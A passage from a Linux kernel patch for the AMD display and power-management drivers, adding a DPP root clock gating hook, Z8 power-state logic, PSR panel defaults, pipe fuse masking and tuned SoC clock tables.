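The gating trick in dccg314_dpp_root_clock_control() relies on the DTO acting as a fractional divider, out = in * PHASE / MODULO (the convention implied by the values used above):

	gate:    PHASE = 0,    MODULO = 1     ->  out = 0 Hz
	ungate:  PHASE = 0xFF, MODULO = 0xFF  ->  out = in, and the DTO is
	         disabled anyway so the root clock passes through

This supersedes the workaround just removed from dccg31_update_dpp_dto() earlier in this patch: generating the 0 Hz clock now lives in a dedicated root-clock hook, driven from the hwseq layer via dcn314_dpp_root_clock_control() in the hunks that follow, instead of being folded into DTO programming.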
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+index 8e824dc81dede..414d7358a075f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+@@ -392,6 +392,16 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx)
+ 				pix_per_cycle);
+ }
+ 
++void dcn314_dpp_root_clock_control(struct dce_hwseq *hws, unsigned int dpp_inst, bool clock_on)
++{
++	if (!hws->ctx->dc->debug.root_clock_optimization.bits.dpp)
++		return;
++
++	if (hws->ctx->dc->res_pool->dccg->funcs->dpp_root_clock_control)
++		hws->ctx->dc->res_pool->dccg->funcs->dpp_root_clock_control(
++			hws->ctx->dc->res_pool->dccg, dpp_inst, clock_on);
++}
++
+ void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on)
+ {
+ 	struct dc_context *ctx = hws->ctx;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+index c419d3dbdfee6..c786d5e6a428e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+@@ -43,4 +43,6 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx);
+ 
+ void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on);
+ 
++void dcn314_dpp_root_clock_control(struct dce_hwseq *hws, unsigned int dpp_inst, bool clock_on);
++
+ #endif /* __DC_HWSS_DCN314_H__ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+index 343f4d9dd5e34..5267e901a35c1 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+@@ -137,6 +137,7 @@ static const struct hwseq_private_funcs dcn314_private_funcs = {
+ 	.plane_atomic_disable = dcn20_plane_atomic_disable,
+ 	.plane_atomic_power_down = dcn10_plane_atomic_power_down,
+ 	.enable_power_gating_plane = dcn314_enable_power_gating_plane,
++	.dpp_root_clock_control = dcn314_dpp_root_clock_control,
+ 	.hubp_pg_control = dcn314_hubp_pg_control,
+ 	.program_all_writeback_pipes_in_tree = dcn30_program_all_writeback_pipes_in_tree,
+ 	.update_odm = dcn314_update_odm,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index ffaa4e5b3fca0..b7782433ce6ba 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -884,6 +884,8 @@ static const struct dc_plane_cap plane_cap = {
+ static const struct dc_debug_options debug_defaults_drv = {
+ 	.disable_z10 = false,
+ 	.enable_z9_disable_interface = true,
++	.minimum_z8_residency_time = 2000,
++	.psr_skip_crtc_disable = true,
+ 	.disable_dmcu = true,
+ 	.force_abm_enable = false,
+ 	.timing_trace = false,
+@@ -940,6 +942,10 @@ static const struct dc_debug_options debug_defaults_diags = {
+ };
+ 
+ static const struct dc_panel_config panel_config_defaults = {
++	.psr = {
++		.disable_psr = false,
++		.disallow_psrsu = false,
++	},
+ 	.ilr = {
+ 		.optimize_edp_link_rate = true,
+ 	},
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c b/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
+index 58746c437554f..31cbc5762eab3 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn315/dcn315_resource.c
+@@ -907,6 +907,10 @@ static const struct dc_debug_options debug_defaults_diags = {
+ };
+ 
+ static const struct dc_panel_config panel_config_defaults = {
++	.psr = {
++		.disable_psr = false,
++		.disallow_psrsu = false,
++	},
+ 	.ilr = {
+ 		.optimize_edp_link_rate = true,
+ 	},
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn316/dcn316_resource.c b/drivers/gpu/drm/amd/display/dc/dcn316/dcn316_resource.c
+index 6b40a11ac83a9..af3eddc0cf32e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn316/dcn316_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn316/dcn316_resource.c
+@@ -906,6 +906,10 @@ static const struct dc_debug_options debug_defaults_diags = {
+ };
+ 
+ static const struct dc_panel_config panel_config_defaults = {
++	.psr = {
++		.disable_psr = false,
++		.disallow_psrsu = false,
++	},
+ 	.ilr = {
+ 		.optimize_edp_link_rate = true,
+ 	},
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index 1a85509c12f23..e9188bce62e0b 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -984,6 +984,7 @@ void dcn32_init_hw(struct dc *dc)
+ 	if (dc->ctx->dmub_srv) {
+ 		dc_dmub_srv_query_caps_cmd(dc->ctx->dmub_srv->dmub);
+ 		dc->caps.dmub_caps.psr = dc->ctx->dmub_srv->dmub->feature_caps.psr;
++		dc->caps.dmub_caps.mclk_sw = dc->ctx->dmub_srv->dmub->feature_caps.fw_assisted_mclk_switch;
+ 	}
+ 
+ 	/* Enable support for ODM and windowed MPO if policy flag is set */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index a942e2812183a..814620e6638fd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1984,7 +1984,7 @@ int dcn32_populate_dml_pipes_from_context(
+ 	// In general cases we want to keep the dram clock change requirement
+ 	// (prefer configs that support MCLK switch). Only override to false
+ 	// for SubVP
+-	if (subvp_in_use)
++	if (context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching || subvp_in_use)
+ 		context->bw_ctx.dml.soc.dram_clock_change_requirement_final = false;
+ 	else
+ 		context->bw_ctx.dml.soc.dram_clock_change_requirement_final = true;
+@@ -2037,6 +2037,14 @@ static struct resource_funcs dcn32_res_pool_funcs = {
+ 	.remove_phantom_pipes = dcn32_remove_phantom_pipes,
+ };
+ 
++static uint32_t read_pipe_fuses(struct dc_context *ctx)
++{
++	uint32_t value = REG_READ(CC_DC_PIPE_DIS);
++	/* DCN32 supports max 4 pipes */
++	value = value & 0xf;
++	return value;
++}
++
+ 
+ static bool dcn32_resource_construct(
+ 	uint8_t num_virtual_links,
+@@ -2079,7 +2087,7 @@ static bool dcn32_resource_construct(
+ 	pool->base.res_cap = &res_cap_dcn32;
+ 	/* max number of pipes for ASIC before checking for pipe fuses */
+ 	num_pipes  = pool->base.res_cap->num_timing_generator;
+-	pipe_fuses = REG_READ(CC_DC_PIPE_DIS);
++	pipe_fuses = read_pipe_fuses(ctx);
+ 
+ 	for (i = 0; i < pool->base.res_cap->num_timing_generator; i++)
+ 		if (pipe_fuses & 1 << i)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+index d320e21680da1..213ff3672bd54 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+@@ -1621,6 +1621,14 @@ static struct resource_funcs dcn321_res_pool_funcs = {
+ 	.remove_phantom_pipes = dcn32_remove_phantom_pipes,
+ };
+ 
++static uint32_t read_pipe_fuses(struct dc_context *ctx)
++{
++	uint32_t value = REG_READ(CC_DC_PIPE_DIS);
++	/* DCN321 supports max 4 pipes */
++	value = value & 0xf;
++	return value;
++}
++
+ 
+ static bool dcn321_resource_construct(
+ 	uint8_t num_virtual_links,
+@@ -1663,7 +1671,7 @@ static bool dcn321_resource_construct(
+ 	pool->base.res_cap = &res_cap_dcn321;
+ 	/* max number of pipes for ASIC before checking for pipe fuses */
+ 	num_pipes  = pool->base.res_cap->num_timing_generator;
+-	pipe_fuses = REG_READ(CC_DC_PIPE_DIS);
++	pipe_fuses = read_pipe_fuses(ctx);
+ 
+ 	for (i = 0; i < pool->base.res_cap->num_timing_generator; i++)
+ 		if (pipe_fuses & 1 << i)
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+index 45db40c41882c..186538e3e3c0c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+@@ -963,6 +963,8 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	 * 	2. single eDP, on link 0, 1 plane and stutter period > 5ms
+ 	 * Z10 only cases:
+ 	 * 	1. single eDP, on link 0, 1 plane and stutter period >= 5ms
++	 * Z8 cases:
++	 * 	1. stutter period sufficient
+ 	 * Zstate not allowed cases:
+ 	 * 	1. Everything else
+ 	 */
+@@ -971,6 +973,9 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	else if (context->stream_count == 1 &&  context->streams[0]->signal == SIGNAL_TYPE_EDP) {
+ 		struct dc_link *link = context->streams[0]->sink->link;
+ 		struct dc_stream_status *stream_status = &context->stream_status[0];
++		int minimum_z8_residency = dc->debug.minimum_z8_residency_time > 0 ? dc->debug.minimum_z8_residency_time : 1000;
++		bool allow_z8 = context->bw_ctx.dml.vba.StutterPeriod > (double)minimum_z8_residency;
++		bool is_pwrseq0 = link->link_index == 0;
+ 
+ 		if (dc_extended_blank_supported(dc)) {
+ 			for (i = 0; i < dc->res_pool->pipe_count; i++) {
+@@ -983,18 +988,20 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 				}
+ 			}
+ 		}
+-		/* zstate only supported on PWRSEQ0  and when there's <2 planes*/
+-		if (link->link_index != 0 || stream_status->plane_count > 1)
++
++		/* Don't support multi-plane configurations */
++		if (stream_status->plane_count > 1)
+ 			return DCN_ZSTATE_SUPPORT_DISALLOW;
+ 
+-		if (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || optimized_min_dst_y_next_start_us > 5000)
++		if (is_pwrseq0 && (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || optimized_min_dst_y_next_start_us > 5000))
+ 			return DCN_ZSTATE_SUPPORT_ALLOW;
+-		else if (link->psr_settings.psr_version == DC_PSR_VERSION_1 && !dc->debug.disable_psr)
+-			return DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY;
++		else if (is_pwrseq0 && link->psr_settings.psr_version == DC_PSR_VERSION_1 && !link->panel_config.psr.disable_psr)
++			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY : DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY;
+ 		else
+-			return DCN_ZSTATE_SUPPORT_DISALLOW;
+-	} else
++			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_ONLY : DCN_ZSTATE_SUPPORT_DISALLOW;
++	} else {
+ 		return DCN_ZSTATE_SUPPORT_DISALLOW;
++	}
+ }
+ 
+ void dcn20_calculate_dlg_params(
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+index 990dbd736e2ce..fdfb19337ea6e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+@@ -368,7 +368,9 @@ void dcn30_fpu_update_soc_for_wm_a(struct dc *dc, struct dc_state *context)
+ 	dc_assert_fp_enabled();
+ 
+ 	if (dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].valid) {
+-		context->bw_ctx.dml.soc.dram_clock_change_latency_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.pstate_latency_us;
++		if (!context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching ||
++				context->bw_ctx.dml.soc.dram_clock_change_latency_us == 0)
++			context->bw_ctx.dml.soc.dram_clock_change_latency_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.pstate_latency_us;
+ 		context->bw_ctx.dml.soc.sr_enter_plus_exit_time_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.sr_enter_plus_exit_time_us;
+ 		context->bw_ctx.dml.soc.sr_exit_time_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.sr_exit_time_us;
+ 	}
+@@ -520,9 +522,21 @@ void dcn30_fpu_calculate_wm_and_dlg(
+ 		pipe_idx++;
+ 	}
+ 
+-	DC_FP_START();
++	// WA: restrict FPO to use first non-strobe mode (NV24 BW issue)
++	if (context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching &&
++			dc->dml.soc.num_chans <= 4 &&
++			context->bw_ctx.dml.vba.DRAMSpeed <= 1700 &&
++			context->bw_ctx.dml.vba.DRAMSpeed >= 1500) {
++
++		for (i = 0; i < dc->dml.soc.num_states; i++) {
++			if (dc->dml.soc.clock_limits[i].dram_speed_mts > 1700) {
++				context->bw_ctx.dml.vba.DRAMSpeed = dc->dml.soc.clock_limits[i].dram_speed_mts;
++				break;
++			}
++		}
++	}
++
+ 	dcn20_calculate_dlg_params(dc, context, pipes, pipe_cnt, vlevel);
+-	DC_FP_END();
+ 
+ 	if (!pstate_en)
+ 		/* Restore full p-state latency */
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+index 34b6c763a4554..4f91e64754239 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+@@ -148,8 +148,8 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_14_soc = {
+ 	.num_states = 5,
+ 	.sr_exit_time_us = 16.5,
+ 	.sr_enter_plus_exit_time_us = 18.5,
+-	.sr_exit_z8_time_us = 442.0,
+-	.sr_enter_plus_exit_z8_time_us = 560.0,
++	.sr_exit_z8_time_us = 268.0,
++	.sr_enter_plus_exit_z8_time_us = 393.0,
+ 	.writeback_latency_us = 12.0,
+ 	.dram_channel_width_bytes = 4,
+ 	.round_trip_ping_latency_dcfclk_cycles = 106,
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index e22b4b3880af9..d2b184fdd7e02 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -1200,9 +1200,7 @@ static void dcn32_full_validate_bw_helper(struct dc *dc,
+ 			}
+ 		} else {
+ 			// Most populate phantom DLG params before programming hardware / timing for phantom pipe
+-			DC_FP_START();
+ 			dcn32_helper_populate_phantom_dlg_params(dc, context, pipes, *pipe_cnt);
+-			DC_FP_END();
+ 
+ 			/* Call validate_apply_pipe_split flags after calling DML getters for
+ 			 * phantom dlg params, or some of the VBA params indicating pipe split
+@@ -1503,11 +1501,8 @@ bool dcn32_internal_validate_bw(struct dc *dc,
+ 
+ 	dml_log_pipe_params(&context->bw_ctx.dml, pipes, pipe_cnt);
+ 
+-	if (!fast_validate) {
+-		DC_FP_START();
++	if (!fast_validate)
+ 		dcn32_full_validate_bw_helper(dc, context, pipes, &vlevel, split, merge, &pipe_cnt);
+-		DC_FP_END();
+-	}
+ 
+ 	if (fast_validate ||
+ 			(dc->debug.dml_disallow_alternate_prefetch_modes &&
+@@ -2172,9 +2167,7 @@ static int build_synthetic_soc_states(struct clk_bw_params *bw_params,
+ 		entry.fabricclk_mhz = 0;
+ 		entry.dram_speed_mts = 0;
+ 
+-		DC_FP_START();
+ 		insert_entry_into_table_sorted(table, num_entries, &entry);
+-		DC_FP_END();
+ 	}
+ 
+ 	// Insert the max DCFCLK
+@@ -2182,9 +2175,7 @@ static int build_synthetic_soc_states(struct clk_bw_params *bw_params,
+ 	entry.fabricclk_mhz = 0;
+ 	entry.dram_speed_mts = 0;
+ 
+-	DC_FP_START();
+ 	insert_entry_into_table_sorted(table, num_entries, &entry);
+-	DC_FP_END();
+ 
+ 	// Insert the UCLK DPMS
+ 	for (i = 0; i < num_uclk_dpms; i++) {
+@@ -2192,9 +2183,7 @@ static int build_synthetic_soc_states(struct clk_bw_params *bw_params,
+ 		entry.fabricclk_mhz = 0;
+ 		entry.dram_speed_mts = bw_params->clk_table.entries[i].memclk_mhz * 16;
+ 
+-		DC_FP_START();
+ 		insert_entry_into_table_sorted(table, num_entries, &entry);
+-		DC_FP_END();
+ 	}
+ 
+ 	// If FCLK is coarse grained, insert individual DPMs.
+@@ -2204,9 +2193,7 @@ static int build_synthetic_soc_states(struct clk_bw_params *bw_params,
+ 			entry.fabricclk_mhz = bw_params->clk_table.entries[i].fclk_mhz;
+ 			entry.dram_speed_mts = 0;
+ 
+-			DC_FP_START();
+ 			insert_entry_into_table_sorted(table, num_entries, &entry);
+-			DC_FP_END();
+ 		}
+ 	}
+ 	// If FCLK fine grained, only insert max
+@@ -2215,9 +2202,7 @@ static int build_synthetic_soc_states(struct clk_bw_params *bw_params,
+ 		entry.fabricclk_mhz = max_fclk_mhz;
+ 		entry.dram_speed_mts = 0;
+ 
+-		DC_FP_START();
+ 		insert_entry_into_table_sorted(table, num_entries, &entry);
+-		DC_FP_END();
+ 	}
+ 
+ 	// At this point, the table contains all "points of interest" based on
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index 820042f6aaca5..e02e9d4b04a95 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -807,7 +807,8 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 					v->SwathHeightY[k],
+ 					v->SwathHeightC[k],
+ 					TWait,
+-					v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ?
++					(v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ||
++						v->DCFCLKPerState[mode_lib->vba.VoltageLevel] <= MIN_DCFCLK_FREQ_MHZ) ?
+ 							mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 					/* Output */
+ 					&v->DSTXAfterScaler[k],
+@@ -3288,7 +3289,7 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->swath_width_chroma_ub_this_state[k],
+ 							v->SwathHeightYThisState[k],
+ 							v->SwathHeightCThisState[k], v->TWait,
+-							v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ ?
++							(v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ || v->DCFCLKState[i][j] <= MIN_DCFCLK_FREQ_MHZ) ?
+ 									mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 
+ 							/* Output */
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+index c8b28c83ddf48..e92eee2c664d0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+@@ -52,6 +52,7 @@
+ #define BPP_BLENDED_PIPE 0xffffffff
+ 
+ #define MEM_STROBE_FREQ_MHZ 1600
++#define MIN_DCFCLK_FREQ_MHZ 200
+ #define MEM_STROBE_MAX_DELIVERY_TIME_US 60.0
+ 
+ struct display_mode_lib;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index b80cef70fa60f..383a409a3f54c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -106,16 +106,16 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.clock_limits = {
+ 		{
+ 			.state = 0,
+-			.dcfclk_mhz = 1564.0,
+-			.fabricclk_mhz = 400.0,
+-			.dispclk_mhz = 2150.0,
+-			.dppclk_mhz = 2150.0,
++			.dcfclk_mhz = 1434.0,
++			.fabricclk_mhz = 2250.0,
++			.dispclk_mhz = 1720.0,
++			.dppclk_mhz = 1720.0,
+ 			.phyclk_mhz = 810.0,
+ 			.phyclk_d18_mhz = 667.0,
+-			.phyclk_d32_mhz = 625.0,
++			.phyclk_d32_mhz = 313.0,
+ 			.socclk_mhz = 1200.0,
+-			.dscclk_mhz = 716.667,
+-			.dram_speed_mts = 1600.0,
++			.dscclk_mhz = 573.333,
++			.dram_speed_mts = 16000.0,
+ 			.dtbclk_mhz = 1564.0,
+ 		},
+ 	},
+@@ -125,14 +125,14 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.sr_exit_z8_time_us = 285.0,
+ 	.sr_enter_plus_exit_z8_time_us = 320,
+ 	.writeback_latency_us = 12.0,
+-	.round_trip_ping_latency_dcfclk_cycles = 263,
++	.round_trip_ping_latency_dcfclk_cycles = 207,
+ 	.urgent_latency_pixel_data_only_us = 4,
+ 	.urgent_latency_pixel_mixed_with_vm_data_us = 4,
+ 	.urgent_latency_vm_data_only_us = 4,
+-	.fclk_change_latency_us = 20,
+-	.usr_retraining_latency_us = 2,
+-	.smn_latency_us = 2,
+-	.mall_allocated_for_dcn_mbytes = 64,
++	.fclk_change_latency_us = 7,
++	.usr_retraining_latency_us = 0,
++	.smn_latency_us = 0,
++	.mall_allocated_for_dcn_mbytes = 32,
+ 	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+index ce006762f2571..ad6acd1b34e1d 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+@@ -148,18 +148,21 @@ struct dccg_funcs {
+ 		struct dccg *dccg,
+ 		int inst);
+ 
+-void (*set_pixel_rate_div)(
+-        struct dccg *dccg,
+-        uint32_t otg_inst,
+-        enum pixel_rate_div k1,
+-        enum pixel_rate_div k2);
+-
+-void (*set_valid_pixel_rate)(
+-        struct dccg *dccg,
+-	int ref_dtbclk_khz,
+-        int otg_inst,
+-        int pixclk_khz);
++	void (*set_pixel_rate_div)(struct dccg *dccg,
++			uint32_t otg_inst,
++			enum pixel_rate_div k1,
++			enum pixel_rate_div k2);
+ 
++	void (*set_valid_pixel_rate)(
++			struct dccg *dccg,
++			int ref_dtbclk_khz,
++			int otg_inst,
++			int pixclk_khz);
++
++	void (*dpp_root_clock_control)(
++			struct dccg *dccg,
++			unsigned int dpp_inst,
++			bool clock_on);
+ };
+ 
+ #endif //__DAL_DCCG_H__
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h b/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
+index a4d61bb724b67..39bd53b790201 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
+@@ -115,6 +115,10 @@ struct hwseq_private_funcs {
+ 	void (*plane_atomic_disable)(struct dc *dc, struct pipe_ctx *pipe_ctx);
+ 	void (*enable_power_gating_plane)(struct dce_hwseq *hws,
+ 		bool enable);
++	void (*dpp_root_clock_control)(
++			struct dce_hwseq *hws,
++			unsigned int dpp_inst,
++			bool clock_on);
+ 	void (*dpp_pg_control)(struct dce_hwseq *hws,
+ 			unsigned int dpp_inst,
+ 			bool power_on);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+index a76da0131addd..9c20516be066c 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+@@ -130,12 +130,13 @@ void dmub_dcn32_reset(struct dmub_srv *dmub)
+ 	REG_WRITE(DMCUB_INBOX1_WPTR, 0);
+ 	REG_WRITE(DMCUB_OUTBOX1_RPTR, 0);
+ 	REG_WRITE(DMCUB_OUTBOX1_WPTR, 0);
++	REG_WRITE(DMCUB_OUTBOX0_RPTR, 0);
++	REG_WRITE(DMCUB_OUTBOX0_WPTR, 0);
+ 	REG_WRITE(DMCUB_SCRATCH0, 0);
+ }
+ 
+ void dmub_dcn32_reset_release(struct dmub_srv *dmub)
+ {
+-	REG_WRITE(DMCUB_GPINT_DATAIN1, 0);
+ 	REG_UPDATE(MMHUBBUB_SOFT_RESET, DMUIF_SOFT_RESET, 0);
+ 	REG_WRITE(DMCUB_SCRATCH15, dmub->psp_version & 0x001100FF);
+ 	REG_UPDATE_2(DMCUB_CNTL, DMCUB_ENABLE, 1, DMCUB_TRACEPORT_EN, 1);
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_dpm.c b/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
+index 1b300c569faf5..69b51612c39a5 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_dpm.c
+@@ -36,6 +36,8 @@
+ #define amdgpu_dpm_enable_bapm(adev, e) \
+ 		((adev)->powerplay.pp_funcs->enable_bapm((adev)->powerplay.pp_handle, (e)))
+ 
++#define amdgpu_dpm_is_legacy_dpm(adev) ((adev)->powerplay.pp_handle == (adev))
++
+ int amdgpu_dpm_get_sclk(struct amdgpu_device *adev, bool low)
+ {
+ 	const struct amd_pm_funcs *pp_funcs = adev->powerplay.pp_funcs;
+@@ -1414,15 +1416,24 @@ int amdgpu_dpm_get_smu_prv_buf_details(struct amdgpu_device *adev,
+ 
+ int amdgpu_dpm_is_overdrive_supported(struct amdgpu_device *adev)
+ {
+-	struct pp_hwmgr *hwmgr = adev->powerplay.pp_handle;
+-	struct smu_context *smu = adev->powerplay.pp_handle;
++	if (is_support_sw_smu(adev)) {
++		struct smu_context *smu = adev->powerplay.pp_handle;
+ 
+-	if ((is_support_sw_smu(adev) && smu->od_enabled) ||
+-	    (is_support_sw_smu(adev) && smu->is_apu) ||
+-		(!is_support_sw_smu(adev) && hwmgr->od_enabled))
+-		return true;
++		return (smu->od_enabled || smu->is_apu);
++	} else {
++		struct pp_hwmgr *hwmgr;
+ 
+-	return false;
++		/*
++		 * dpm on some legacy asics doesn't carry the od_enabled member
++		 * as its pp_handle is cast directly from adev.
++		 */
++		if (amdgpu_dpm_is_legacy_dpm(adev))
++			return false;
++
++		hwmgr = (struct pp_hwmgr *)adev->powerplay.pp_handle;
++
++		return hwmgr->od_enabled;
++	}
+ }
+ 
+ int amdgpu_dpm_set_pp_table(struct amdgpu_device *adev,
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index 1b74a913f1b8f..5e419934d2a39 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -504,7 +504,6 @@ static int lt8912_attach_dsi(struct lt8912 *lt)
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO |
+-			  MIPI_DSI_MODE_VIDEO_BURST |
+ 			  MIPI_DSI_MODE_LPM |
+ 			  MIPI_DSI_MODE_NO_EOT_PACKET;
+ 
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
